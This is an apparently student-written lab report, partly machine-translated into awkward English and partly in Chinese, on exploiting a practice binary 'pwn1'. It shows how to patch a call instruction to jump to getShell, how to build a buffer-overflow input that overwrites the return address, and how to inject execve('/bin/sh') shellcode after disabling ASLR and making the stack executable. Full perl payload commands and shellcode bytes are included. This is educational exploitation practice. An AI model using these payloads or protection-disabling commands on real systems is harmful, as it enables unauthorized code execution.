A practice target
- 1. The practice of object is a linux executable file named pwn1 of.
- 2. The normal flow of execution is: main function calls foo, foo function would simply echo any user input string.
- 3. The program contains another code segment, getShell, it will return a usable Shell. This code is not normally run. The goal of our practice is to find ways to run this code snippet. We will
learn two ways to run this code snippet, and then learn how to inject any Shellcode run.
Second, practice content
- 1. Manually modify the executable file, change the program execution flow directly jumps to getShell function.
- 2. Using foo function Bof vulnerability, an attacker construct input string, overwriting the return address, trigger getShell function.
- 3. Fill a produce their own shellcode and run this shellcode.
Third, the basics
Familiar with the basic operation of Linux
1. pipe (|): used to inject file data
pipeline is a basic IPC mechanism, acting between the process of blood to complete the data transfer.
Cited by the two file descriptors, one for the read end, represents a write end.
Predetermined data from the write pipe end of the pipe flows, the outflow from the read end.
2. The input and output redirection (> >> <)
>: the right to cover the output of the command to the specified file or device which.
>>: redirected to a file in append mode device.
<: The file as input commands, such as statistical lines, words and characters in the book when wc command.
Master NOP, JNE, JE, JMP, CMP compiled machine code instructions
1.NOP (NOP instruction that is "empty instruction" to the NOP instruction is executed, CPU does not do anything, just as an instruction to execute an instruction in the past and continue behind the NOP..)
2.JNE: 75 (conditional branch instruction, If the jump if not equal).
3.JE:74 (conditional branch instruction, jump if equal).
4.CMP: ~ 38 is 3D (compare instruction, subtraction instruction corresponding to the function, but the operands of comparison between do not save the result.)
Related instructions, parameters
1. disassembly instructions
objdump -d <file (s)> : The disassembled code segment;
objdump -S <File (S)>: The disassembled code segment, while the source and disassembly are alternately displayed, compiled when -g required parameters, i.e. to debug information;
objdump -l <file (S)>: disassembly insert the file name and line number
2. Hex Programming:
vim
:!% Xxd switch the display mode (mode hexadecimal, ASCII code mode)
3.gdb common commands
break (b): setting a breakpoint
run (r): Run the program
clear: clear breakpoints
info: Displays breakpoint information
attach: the program is continued
Fourth, the practice of step
A task
Manually modify the executable file, changing the program execution flow
Practical steps
1. command
objdump -d pwn1 | moredisassemble the target file, locategetshellandfoo
2.call 8048491 "is the assembler instruction
is the instruction that invokes said at address function foo 8,048,491; machine instruction corresponding to" e8 d7ffffff ", e8 i.e. jump meaning.
Originally the normal process, the value of the moment of EIP it should be the address of the next instruction, that 80484ba, but as one explain this instruction does e8, CPU will turn instructions "EIP + d7ffffff" the position of execution. "d7ffffff" is a complement, represents -41,41 = 0x29 , 80484ba + d7ffffff = 80484ba-0x29 is exactly 8,048,491 this value, main function call foo, the corresponding machine instructions to "e8 d7ffffff", then we want it to call getShell, just change "d7ffffff" is, "getShell-80484ba" corresponding complement on the line.
use the Windows calculator, you can get directly 47d-4ba complement, it is c3ffffff.
Here we modify executable files, which will target address of the call instruction by d7ffffff become c3ffffff.
3. Enter the command
vi pwn1, then execute
key ESC Press
Enter the following, the mode is switched to the display mode 16 hex:%!xxd
to find content to be modified, i.e. e8d7
find the content and disassembled before and after the contrast was confirmed to be the correct place, modified d7 c3 to
convert raw hexadecimal format:%!xxd -r
exit vi save:wq
Task II
By constructing the input parameters, resulting in BOF attack, changing the flow of the program
Practical steps
- The backup file restored by the file pwn1
cp pwn1.bak pwn1 - 通过反汇编指令观察foo函数为其输入留了多少空间,通过图示可以计算实现缓冲区溢出的字符数为28+4=32 个字节,因此需要将getShell函数的地址放在返回地址即需要33~36字节。(如下是输入11111111222222233333334444444455555555的测试)
- 把33~36四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell,getShell的内存地址,通过反汇编时可以看到,即0804847d。
- 构造输入
11111111222222223333333344444444\x7d\x84\x04\x08,由于我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input - 可以使用16进制查看指令xxd查看input文件的内容是否如预期
- 然后将input的输入,通过管道符“|”,作为pwn1的输入
任务三
注入Shellcode并执行
实践步骤
- 准备一段Shellcode
shellcode就是一段机器指令(code)
通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
所以这段机器指令被称为shellcode。
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。 修改些设置。
execstack -s pwn1//设置堆栈可执行
execstack -q pwn1//查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space//关闭地址随机化
more /proc/sys/kernel/randomize_va_space
- 构造要注入的payload。
结构为:anything+retaddr+nops+shellcode。 构造命令
perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
特别提醒:最后一个字符千万不能是\x0a。不然下面的操作就做不了了。
- 原终端a运行
(cat input_shellcode;cat) | ./pwn3,另起一个终端b进行gdb调试,disassemble foo进行反编译,可以看到ret指令的地址为0x080484ae,在此处设置断点break *0x080484ae
- 在a终端中按下回车运行,程序执行到断点停止,再在b终端输入c继续运行程序,然后输入
info r esp查看esp寄存器地址
可以观察到0x01020304的地址为0xffffd32c,因此shellcode注入位置(可以使最先出现0x90的位置)地址为0xffffd32c+0x00000004=0xffffd330
重新定义 input_shellcode
perl -e 'print "A" x 32;print"\x30\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
输入命令(cat input_shellcode;cat) | ./pwn3验证结果是否成功
四、实践总结
- 什么是漏洞?漏洞有什么危害?
答:漏洞即为系统或者程序中存在的缺陷,漏洞可以用来进行未授权访问用户或者对用户系统进行破坏。 - 实验感想
由于本次实验有老师提供的视频和资料参考,所以实验思路比较清晰,任务一和任务二很快就做完了,但是在做任务三时,由于自己粗心,把注入地址0xffffd32c+0x00000004误算为0xffffd33d(正确结果为0xffffd330),导致自己频繁出错(如下)
在经过仔细检查后,发现并改正后得以完成。本次实践过程比较简单,根据视频很快就能做完,但是其中的很多原理不是很理解,我觉得只有多次实践后才能理解的更加透彻明白。 - 实验中遇到的问题1:在普通用户中输入su 欲进入管理员权限时,出现如下错误
经过查询,输入sudo su即可
